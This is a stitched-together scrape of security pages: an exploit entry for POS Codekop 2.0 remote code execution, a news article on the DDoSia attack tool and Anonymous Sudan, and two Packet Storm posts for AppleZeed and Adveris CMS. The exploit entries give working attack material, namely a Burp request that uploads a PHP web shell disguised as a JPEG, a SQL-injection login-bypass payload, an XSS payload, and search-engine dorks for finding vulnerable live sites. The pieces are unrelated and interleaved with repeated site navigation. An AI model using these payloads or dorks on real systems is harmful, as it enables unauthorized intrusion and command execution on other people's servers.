    # Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)# Date: 25-05-2023# Exploit Author: yuyudhn# Vendor Homepage: https://www.codekop.com/# Software Link: https://github.com/fauzan1892/pos-kasir-php# Version: 2.0# Tested on: Linux# CVE: CVE-2023-36348# Vulnerability description: The application does not sanitize the filenameparameter when sending data to /fungsi/edit/edit.php?gambar=user. Anattacker can exploit this issue by uploading a PHP file and accessing it,leading to Remote Code Execution.# Reference: https://yuyudhn.github.io/pos-codekop-vulnerability/# Proof of Concept:1. Login to POS Codekop dashboard.2. Go to profile settings.3. Upload PHP script through Upload Profile Photo.Burp Log Example:```POST /research/pos-kasir-php/fungsi/edit/edit.php?gambar=user HTTP/1.1Host: localhostContent-Length: 8934Cache-Control: max-age=0sec-ch-ua:sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""**Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data;boundary=----WebKitFormBoundarymVBHqH4m6KgKBnpaUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-User: ?1**Sec-Fetch-Dest: documentReferer: http://localhost/research/pos-kasir-php/index.php?page=userAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vqlfiarme77n1r4o8eh2kglfhvConnection: close------WebKitFormBoundarymVBHqH4m6KgKBnpaContent-Disposition: form-data; name="foto"; filename="asuka-rce.php"Content-Type: image/jpegÿØÿà JFIF HHÿþ6<?php passthru($_GET['cmd']); __halt_compiler(); ?>ÿÛC-----------------------------```PHP Web Shell location:http://localhost/research/pos-kasir-php/assets/img/user/[random_number]asuka-rce.php

POS Codekop 2.0 Shell Upload

The threat actors behind the DDoSia attack tool have come up with a new version that incorporates a new mechanism to retrieve the list of targets to be bombarded with junk HTTP requests in an attempt to bring them down.
The updated variant, written in Golang, "implements an additional security mechanism to conceal the list of targets, which is transmitted from the [command-and-control] to the

The threat actors behind the **DDoSia** attack tool have come up with a new version that incorporates a new mechanism to retrieve the list of targets to be bombarded with junk HTTP requests in an attempt to bring them down.

The updated variant, written in Golang, "implements an additional security mechanism to conceal the list of targets, which is transmitted from the \[command-and-control\] to the users," cybersecurity company Sekoia said in a technical write-up.

DDoSia is attributed to a pro-Russian hacker group called NoName(057)16. Launched in 2022 and a successor of the Bobik botnet, the attack tool is designed for staging distributed denial-of-service (DDoS) attacks against targets primarily located in Europe as well as Australia, Canada, and Japan.

Lithuania, Ukraine, Poland, Italy, Czechia, Denmark, Latvia, France, the U.K., and Switzerland have emerged as the most targeted countries over a period ranging from May 8 to June 26, 2023. A total of 486 different websites were impacted.

Python and Go-based implementations of DDoSia have been unearthed to date, making it a cross-platform program capable of being used across Windows, Linux, and macOS systems.

"DDoSia is a multi-threaded application that conducts denial-of-service attacks against target sites by repeatedly issuing network requests," SentinelOne explained in an analysis published in January 2023. "DDoSia issues requests as instructed by a configuration file that the malware receives from a C2 server when started."

DDoSia is distributed through a fully-automated process on Telegram that allows individuals to register for the crowdsourced initiative in exchange for a cryptocurrency payment and a ZIP archive containing the attack toolkit.

What's noteworthy about the new version is the use of encryption to mask the list of targets to be attacked, indicating that the tool is being actively maintained by the operators.

"NoName057(16) is making efforts to make their malware compatible with multiple operating systems, almost certainly reflecting their intent to make their malware available to a large number of users, resulting in the targeting of a broader set of victims," Sekoia said.

The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned of targeted denial-of-service (DoS) and DDoS attacks against multiple organizations in multiple sectors.

"These attacks can cost an organization time and money and may impose reputational costs while resources and services are inaccessible," the agency said in a bulletin.

Although CISA did not provide any additional specifics, the warning overlaps with claims by Anonymous Sudan on its Telegram channel that it had taken down the websites of the Department of Commerce, Social Security Administration (SSA), and the Treasury Department's Electronic Federal Tax Payment System (EFTPS).

Anonymous Sudan attracted attention last month for carrying Layer 7 DDoS attacks against various Microsoft services, including OneDrive, Outlook, and Azure web portals. The tech giant is tracking the cluster under the name Storm-1359.

The hacking crew has asserted it's conducting cyber strikes out of Africa on behalf of oppressed Muslims across the world. But cybersecurity researchers believe it to be a pro-Kremlin operation with no ties to Sudan and a member of the KillNet hacktivist collective.

In an analysis released on June 19, 2023, Australian cybersecurity vendor CyberCX characterized the entity as a "smokescreen for Russian interests." The company's website has since become inaccessible, greeting visitors with a "403 Forbidden" message. The threat actor claimed responsibility for the cyber attack.

"The reason for the attack: stop spreading rumors about us, and you must tell the truth and stop the investigations that we call the investigations of a dog," Anonymous Sudan said in a message posted on June 22, 2023.

Anonymous Sudan, in a Bloomberg report last week, further denied it was connected to Russia but acknowledged they share similar interests, and that it goes after "everything that is hostile to Islam."

CISA's latest advisory has also not gone unnoticed, for the group posted a response on June 30, 2023, stating: "A small Sudanese group with limited capabilities forced 'the most powerful government' in the world to publish articles and tweets about our attacks."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

DDoSia Attack Tool Evolves with Encryption, Targeting Multiple Sectors

AppleZeed CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

**AppleZeed CMS 2.0 SQL Injection**

Posted Jul 4, 2023

Authored by indoushka

AppleZeed CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, sql injection

SHA-256 | b10dc7fe6d4f1a88b74eac3ee061dec5b828171e6513804abc4b45080828e37b

Download | Favorite | View

**AppleZeed CMS 2.0 SQL Injection**

    ====================================================================================================================================| # Title     : AppleZeed CMS v2.0 Auth by pass Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 71.0(32-bit)                                               | | # Vendor    : https://applezeed.com                                                                                              |  | # Dork      : intext:"Power BY applezeed.com "php?id="                                                                           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user & pass = 1' or 1=1 -- -[+] admin path = /backend/[+] http://TARGET/backend/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,564)
*   Arbitrary (16,123)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,205)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,331)
*   DoS (23,296)
*   Encryption (2,364)
*   Exploit (51,438)
*   File Inclusion (4,203)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,743)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,414)
*   Magazine (586)
*   Overflow (12,629)
*   Perl (1,423)
*   PHP (5,136)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,592)
*   Root (3,574)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,862)
*   Shell (3,170)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,261)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,656)
*   Web (9,602)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,795)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,783)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,075)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,716)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

AppleZeed CMS 2.0 SQL Injection

Adveris CMS version 3.0 suffers from a cross site scripting vulnerability.

**Adveris CMS 3.0 Cross Site Scripting**

Posted Jul 4, 2023

Authored by indoushka

Adveris CMS version 3.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | f4e69d15add89915deaf239446b331cc9106cc57ee69bf29f992d6be03d4d471

Download | Favorite | View

**Adveris CMS 3.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Adveris CMS v3.0 XSS Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               | | # Vendor    : http://adveris.fr                                                                                                  |  | # Dork      : "Création site internet : Adveris" inurl:.php?id=                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /sous-categorie.php?id=6<--`<script>alert(/indoushka/);</script>``> --!>[+] http://w127.0.0.1/coveprofr/sous-categorie.php?id=6%3C--`%3Cscript%3Ealert(/indoushka/);%3C/script%3E``%3E%20--!%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,556)
*   Arbitrary (16,119)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,203)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,329)
*   DoS (23,289)
*   Encryption (2,363)
*   Exploit (51,413)
*   File Inclusion (4,202)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,742)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,412)
*   Magazine (586)
*   Overflow (12,628)
*   Perl (1,423)
*   PHP (5,134)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,582)
*   Root (3,573)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,861)
*   Shell (3,168)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,254)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,654)
*   Web (9,600)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,791)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,782)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,067)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,709)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

Tag

#linux